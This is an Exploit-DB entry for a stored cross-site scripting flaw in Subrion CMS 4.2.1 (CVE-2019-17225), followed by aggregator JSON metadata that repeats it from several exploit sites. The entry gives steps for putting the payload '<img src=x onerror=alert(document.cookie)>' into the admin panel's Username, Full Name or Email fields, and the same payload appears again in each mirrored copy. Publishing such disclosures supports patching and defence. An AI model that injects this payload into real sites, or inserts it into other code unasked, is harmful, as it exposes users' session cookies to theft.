ID EDB-ID:47469 Type exploitdb Reporter Exploit-DB Modified 2019-10-07T00:00:00
Description
# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting
# Date: 2019-10-07
# Author: Min Ko Ko (Creatigon)
# Vendor Homepage: https://subrion.org/
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225
# Website : https://l33thacker.com
# Description : Allows XSS via the panel/members/ Username, Full Name, or
# Email field, aka an "Admin Member JSON Update" issue.
First, log in to the panel with a user credential, then go to the Members tab in the left menu.
http://localhost/panel/members/
Username, Full Name and Email are editable by double-clicking on them. Insert the
following payload:
<img src=x onerror=alert(document.cookie)>
{"id": "EDB-ID:47469", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting", "description": "", "published": "2019-10-07T00:00:00", "modified": "2019-10-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/47469", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2019-17225"], "lastseen": "2019-10-07T11:43:33", "viewCount": 164, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-17225"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154746"]}, {"type": "zdt", "idList": ["1337DAY-ID-33333"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:EE79AA06B19DD30C3A277869A2AA02AC"]}], "modified": "2019-10-07T11:43:33", "rev": 2}, "score": {"value": 3.3, "vector": "NONE", "modified": "2019-10-07T11:43:33", "rev": 2}, "vulnersScore": 3.3}, "sourceHref": "https://www.exploit-db.com/download/47469", "sourceData": "# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting\r\n# Date: 2019-10-07\r\n# Author: Min Ko Ko (Creatigon)\r\n# Vendor Homepage: https://subrion.org/\r\n# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225\r\n# Website : https://l33thacker.com\r\n# Description : Allows XSS via the panel/members/ Username, Full Name, or\r\n# Email field, aka an \"Admin Member JSON Update\" issue.\r\n\r\nFirst login the panel with user credential, Go to member tag from left menu.\r\n\r\nhttp://localhost/panel/members/\r\n\r\nUsername, Full Name, Email are editable with double click on it. Insert the\r\nfollowing payload\r\n\r\n<img src=x onerror=alert(document.cookie)>", "osvdbidlist": []}
{"cve": [{"lastseen": "2021-02-02T07:12:55", "description": "Subrion 4.2.1 allows XSS via the panel/members/ Username, Full Name, or Email field, aka an \"Admin Member JSON Update\" issue.", "edition": 5, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2019-10-06T17:15:00", "title": "CVE-2019-17225", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17225"], "modified": "2019-10-08T14:10:00", "cpe": ["cpe:/a:intelliants:subrion:4.2.1"], "id": "CVE-2019-17225", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-17225", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:intelliants:subrion:4.2.1:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2019-12-04T16:01:41", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2019-10-07T00:00:00", "title": "Subrion 4.2.1 - (Email) Persistant Cross-Site Scripting Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-17225"], "modified": "2019-10-07T00:00:00", "id": "1337DAY-ID-33333", "href": 
"https://0day.today/exploit/description/33333", "sourceData": "# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting\r\n# Author: Min Ko Ko (Creatigon)\r\n# Vendor Homepage: https://subrion.org/\r\n# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225\r\n# Website : https://l33thacker.com\r\n# Description : Allows XSS via the panel/members/ Username, Full Name, or\r\n# Email field, aka an \"Admin Member JSON Update\" issue.\r\n\r\nFirst login the panel with user credential, Go to member tag from left menu.\r\n\r\nhttp://localhost/panel/members/\r\n\r\nUsername, Full Name, Email are editable with double click on it. Insert the\r\nfollowing payload\r\n\r\n<img src=x onerror=alert(document.cookie)>\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "sourceHref": "https://0day.today/exploit/33333"}], "packetstorm": [{"lastseen": "2019-10-08T14:51:01", "description": "", "published": "2019-10-07T00:00:00", "type": "packetstorm", "title": "Subrion 4.2.1 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-17225"], "modified": "2019-10-07T00:00:00", "id": "PACKETSTORM:154746", "href": "https://packetstormsecurity.com/files/154746/Subrion-4.2.1-Cross-Site-Scripting.html", "sourceData": "`# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting \n# Date: 2019-10-07 \n# Author: Min Ko Ko (Creatigon) \n# Vendor Homepage: https://subrion.org/ \n# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225 \n# Website : https://l33thacker.com \n# Description : Allows XSS via the panel/members/ Username, Full Name, or \n# Email field, aka an \"Admin Member JSON Update\" issue. \n \nFirst login the panel with user credential, Go to member tag from left menu. \n \nhttp://localhost/panel/members/ \n \nUsername, Full Name, Email are editable with double click on it. 
Insert the \nfollowing payload \n \n<img src=x onerror=alert(document.cookie)> \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/154746/subrion421email-xss.txt"}], "exploitpack": [{"lastseen": "2020-04-01T20:40:43", "description": "\nSubrion 4.2.1 - Email Persistant Cross-Site Scripting", "edition": 1, "published": "2019-10-07T00:00:00", "title": "Subrion 4.2.1 - Email Persistant Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-17225"], "modified": "2019-10-07T00:00:00", "id": "EXPLOITPACK:EE79AA06B19DD30C3A277869A2AA02AC", "href": "", "sourceData": "# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting\n# Date: 2019-10-07\n# Author: Min Ko Ko (Creatigon)\n# Vendor Homepage: https://subrion.org/\n# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225\n# Website : https://l33thacker.com\n# Description : Allows XSS via the panel/members/ Username, Full Name, or\n# Email field, aka an \"Admin Member JSON Update\" issue.\n\nFirst login the panel with user credential, Go to member tag from left menu.\n\nhttp://localhost/panel/members/\n\nUsername, Full Name, Email are editable with double click on it. Insert the\nfollowing payload\n\n<img src=x onerror=alert(document.cookie)>", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}]}